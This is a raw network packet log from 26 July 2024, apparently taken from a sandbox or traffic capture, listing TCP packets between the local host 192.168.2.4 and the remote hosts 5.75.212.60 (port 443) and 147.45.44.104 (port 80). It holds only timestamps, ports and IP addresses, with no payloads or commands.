Jul 26, 2024 18:56:32.699948072 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.699955940 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.699990988 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.738876104 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.738913059 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.739003897 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.739010096 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.739039898 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.739054918 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.739377975 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.739403963 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.739439011 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.739445925 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.739470005 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.739480972 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.742675066 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.742702007 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.742739916 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.742747068 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.742764950 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.742783070 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.743166924 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743186951 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743242025 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.743248940 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743284941 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.743479013 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743496895 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743532896 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.743537903 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.743565083 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.743573904 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.781646013 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.781692028 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.781768084 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.781775951 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:32.781795025 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.781822920 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.782341957 CEST	49753	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:32.782354116 CEST	443	49753	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.047034979 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.047135115 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.047246933 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.047467947 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.047483921 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.853384972 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.853485107 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.854254961 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.854274035 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.856550932 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.856564999 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:33.856609106 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:33.856618881 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:34.267179966 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:34.267225027 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:34.267304897 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:34.267589092 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:34.267606020 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.073607922 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.073693991 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.073728085 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.073764086 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.076304913 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.076390028 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.107391119 CEST	49754	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.107420921 CEST	443	49754	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.108552933 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.108565092 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:35.138847113 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:35.138866901 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.758769989 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.758796930 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.758841991 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.758852005 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.758862019 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.758893013 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.759155035 CEST	49755	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.759176016 CEST	443	49755	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.762008905 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.762053013 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:36.762128115 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.762342930 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:36.762356997 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:37.491338968 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:37.491421938 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:37.491916895 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:37.491944075 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:37.493699074 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:37.493711948 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:38.125349998 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:38.125422001 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:38.125569105 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:38.125905037 CEST	49756	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:38.125921011 CEST	443	49756	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:38.129010916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.134782076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.135025024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.135025024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.142668009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865869999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865889072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865900040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865973949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865981102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.865984917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.865997076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.866009951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.866033077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.866040945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.867201090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.867211103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.867223024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:38.867254972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:38.867271900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.053220987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053236008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053247929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053273916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.053298950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.053560972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053570986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053581953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.053587914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.053601980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.053622007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.054749966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.054759979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.054770947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.054781914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.054792881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.054814100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.055306911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.055320978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.055331945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.055361032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.055368900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.056114912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.056124926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.056134939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.056148052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.056173086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.067363024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.067406893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.067698956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.067712069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.067735910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.067751884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.068001032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.068034887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.068161011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.068197966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.069951057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.069988012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.070089102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.070128918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086623907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086636066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086647034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086663961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086678982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086894035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086905003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086915016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086925983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086934090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086940050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086946011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086956024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086958885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086968899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086971045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.086982965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.086997986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087168932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087182045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087193012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087203026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087205887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087217093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087219954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087229013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087235928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.087244987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087258101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.087270021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.102526903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.102540016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.102607965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117098093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117182970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117217064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117228031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117239952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117250919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117258072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117263079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117275953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117290974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117311001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117772102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117784023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117794991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117806911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117810965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117819071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117830992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.117845058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.117878914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.175143957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175170898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175183058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175194025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175204992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175216913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.175220013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.175246000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.175273895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.177691936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177712917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177723885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177742958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.177756071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.177886009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177898884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177911043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177922964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.177922964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.177949905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.177977085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.178002119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.178014994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.178025961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.178035975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.178039074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.178050995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.178052902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.178072929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.178096056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.207020998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207041025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207051992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207138062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.207180977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.207329035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207339048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207351923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207364082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.207381964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.207381964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.207393885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.208910942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208923101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208934069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208945036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208956003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208960056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.208967924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208976030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.208981991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.208992004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.208993912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.209007978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.209016085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.209036112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.209057093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.268013954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.268033028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.268044949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.268136978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.269174099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269186020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269196987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269222975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.269242048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.269399881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269412994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269424915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.269435883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.269455910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.270034075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270054102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270065069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270072937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.270097971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.270113945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.270915031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270926952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270940065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.270953894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.270979881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.272079945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272092104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272103071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272123098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.272138119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.272413969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272425890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272438049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.272450924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.272469044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.273236036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.273248911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.273260117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.273284912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.273303986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.274775982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.274787903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.274799109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.274822950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.274848938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.274960995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.274997950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.275019884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.275032997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.275054932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.275072098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277128935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277142048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277153015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277204037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277225971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277232885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277240038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277251005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277266026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277283907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277287960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277301073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277324915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.277328014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.277359009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:39.278573990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:39.278584957 CEST	80	49757	147.45.44.104	192.168.2.4
